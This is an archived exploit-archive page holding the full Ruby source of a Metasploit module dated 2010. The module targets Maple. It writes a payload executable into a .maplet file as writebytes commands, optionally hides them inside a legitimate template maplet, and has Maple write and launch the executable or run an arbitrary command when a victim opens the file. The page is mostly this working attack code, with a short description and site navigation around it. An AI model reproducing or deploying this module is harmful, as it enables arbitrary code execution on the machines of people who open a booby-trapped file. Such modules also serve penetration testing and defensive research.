what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Maple Maplet File Creation and Command Execution

Maple Maplet File Creation and Command Execution
Posted May 3, 2010
Authored by scriptjunkie | Site metasploit.com

This Metasploit module harnesses Maple's ability to create files and execute commands automatically when opening a Maplet. All versions up to 13 are suspected vulnerable. Testing was conducted with version 13 on Windows. Standard security settings prevent code from running in a normal maple worksheet without user interaction, but those setting do not prevent code in a Maplet from running. In order for the payload to be executed, an attacker must convince someone to open a specially modified .maplet file with Maple. By doing so, an attacker can execute arbitrary code as the victim user.

tags | exploit, arbitrary
systems | windows
SHA-256 | 48cf2fc583fbcdc37654c0ac828cc80aed7b98dcc536af1af641e2b62e11c413

Maple Maplet File Creation and Command Execution

Change Mirror Download
##
# $Id: maple_maplet.rb 9212 2010-05-03 17:13:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'Maple Maplet File Creation and Command Execution',
'Description' => %q{
This module harnesses Maple's ability to create files and execute commands
automatically when opening a Maplet. All versions up to 13 are suspected
vulnerable. Testing was conducted with version 13 on Windows. Standard security
settings prevent code from running in a normal maple worksheet without user
interaction, but those setting do not prevent code in a Maplet from running.

In order for the payload to be executed, an attacker must convince someone to
open a specially modified .maplet file with Maple. By doing so, an attacker can
execute arbitrary code as the victim user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'scriptjunkie'
],
'Version' => '$Revision: 9212 $',
'References' =>
[
[ 'URL', 'http://www.maplesoft.com/products/maple/' ]
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'DisableNops' => true,
# 'Compat' =>
# {
# 'PayloadType' => 'cmd',
# 'RequiredCmd' => 'generic perl telnet',
# }
},
'Targets' =>
[
[ 'Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],

[ 'Windows X64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'win'
}
],

[ 'Linux',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],

[ 'Linux X64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'linux'
}
],

['Universal CMD',
{
'Arch' => ARCH_CMD,
'Platform' => ['unix', 'win', 'linux']
}
]

],
'DisclosureDate' => 'Apr 26 2010',
'DefaultTarget' => 0))

register_options(
[
OptString.new('TEMPLATE', [ false, 'The file to infect.', '']),
OptString.new('FILENAME', [ true, 'The output file.', 'msf.maplet']),
], self.class)

end


def exploit
cmd = ''
content = ''
if target['Arch'] != ARCH_CMD
#Get payload as executable on whatever platform
plat = Msf::Module::Platform.find_platform(target['Platform'])
binary = Msf::Util::EXE.to_executable(framework, target['Arch'], [plat], payload.encoded)

#Get filename and random variable name for file handle in script
fname = rand_text_alpha(3+rand(15))
if target['Platform'] == 'win'
fname << ".exe"
end
fhandle = rand_text_alpha(3+rand(15))

#Write maple commands to create executable
content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"
exe = binary.unpack('C*')

content << "writebytes(#{fhandle},[#{exe[0]}"
lines = []
1.upto(exe.length-1) do |byte|
if(byte % 100 == 0)
lines.push "]);\r\nwritebytes(#{fhandle},[#{exe[byte]}"
else
lines.push ",#{exe[byte]}"
end
end
content << lines.join("") + "]);\r\n"

content << "fclose(" + fhandle + ");\n"
#Write command to be executed
if target['Platform'] != 'win'
content << "system(\"chmod a+x #{fname}\");\n"
end
content << "system[launch](\"#{fname}\");\n"
else
content << "system(\"#{datastore['CMD']}\");\n"
end

#Then put the rest of the original maplet
if datastore['TEMPLATE'] != ''
File.open(datastore['TEMPLATE'], 'rb') do |fd|
content << fd.read( File.size(datastore['TEMPLATE']) )
end
end

# Create the file
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(content)
end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close